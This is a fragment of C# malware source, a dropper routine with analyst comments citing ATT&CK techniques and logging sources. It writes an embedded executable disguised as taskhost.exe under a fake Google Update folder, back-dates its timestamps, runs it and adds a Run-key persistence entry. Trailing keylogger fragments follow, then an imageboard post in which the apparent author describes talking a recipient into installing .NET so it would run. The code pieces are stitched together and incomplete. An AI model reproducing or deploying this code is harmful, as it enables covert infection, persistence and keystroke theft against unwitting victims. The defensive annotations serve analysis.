/* dropper fragment - background worker to drop embedded resource */
// Analyst summary (from the code below): this DoWork handler writes an embedded
// executable to disk under the user's profile, back-dates the file's timestamps,
// launches it, and registers it under the per-user Run key.
// Every step sits inside an empty catch, so a failure produces no error output.
// The behaviours correspond to MITRE ATT&CK T1036.005 (masquerading by name/location),
// T1070.006 (timestomp) and T1547.001 (registry Run key).
// sender and e are the standard DoWork handler arguments; neither is used in this body.
private void backgroundWorker1_DoWork(object sender, DoWorkEventArgs e)
{
try {
// Target directory resolves to %LOCALAPPDATA%\Google\Update, chosen (per the author's
// original comment) so the file looks like part of Google Update.
string outfile = Path.Combine(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Google"), "Update");
// File name copies a Windows system binary name. The genuine taskhost.exe lives under
// the Windows system directory, so a taskhost.exe in a user-profile path is a
// name/location mismatch that endpoint rules can alert on.
outfile = Path.Combine(outfile, "taskhost.exe");
// Payload is read from the manifest resource "dropper.taskhost.exe" of the running
// assembly and written to outfile; File.Create overwrites an existing file.
// CopyStream is defined elsewhere (not shown here).
// File-creation telemetry (e.g. Sysmon Event ID 11), where enabled, records this write.
using (Stream input = Assembly.GetExecutingAssembly().GetManifestResourceStream("dropper.taskhost.exe"))
using (Stream output = File.Create(outfile))
{
CopyStream(input, output);
output.Close();
input.Close();
}
// Timestomp: last-write and creation times are set to about two months and 40 hours
// before the current local time, plus 33 minutes. DateTime.Now is read separately for
// each call, so the two values can differ slightly. Errors here are silently ignored.
// NOTE(review): on NTFS these calls normally change only the timestamps shown in file
// listings; comparing them with the MFT $FILE_NAME times or the USN journal can expose
// the back-dating - confirm on the volume under analysis. Sysmon Event ID 2 logs
// creation-time changes where configured.
try {
File.SetLastWriteTime(outfile, DateTime.Now.AddMonths(-2).AddHours(-40).AddMinutes(33));
File.SetCreationTime(outfile, DateTime.Now.AddMonths(-2).AddHours(-40).AddMinutes(33));
} catch {}
// Launches the dropped file with no arguments. Process-creation logging (Security
// Event 4688 or Sysmon Event ID 1), where enabled, would show this process as the
// parent and an image path inside the user's profile.
System.Diagnostics.Process.Start(outfile);
try {
// Persistence: opens HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run for writing
// and sets the value "Google Update Taskhost" to the quoted outfile path followed by
// " -update". The value name and data are direct indicators to hunt for; Sysmon
// Event ID 13 logs registry value sets where configured. Errors are silently ignored.
Microsoft.Win32.RegistryKey key = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
key.SetValue("Google Update Taskhost", "\"" + outfile + "\" -update");
} catch {}
}
// Outer catch discards any exception raised by the path, write or launch steps.
catch {}
}
// start background worker to process collected keystrokes
bw1 = new BackgroundWorker();
bw1.DoWork += new DoWorkEventHandler(bw1_DoWork);
bw1.RunWorkerAsync();
// run message loop
Application.Run();
}
private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
{
/* code to handle key events and add them to a queue would be here */
>>6
I needed to code something up quickly, so I used C# instead of fucking around with Sepples nonsense. The joke was on me, though, as the recipient was using an old version of XP that didn't have the .NET Framework installed. Fortunately, though, I managed to convince him to install it.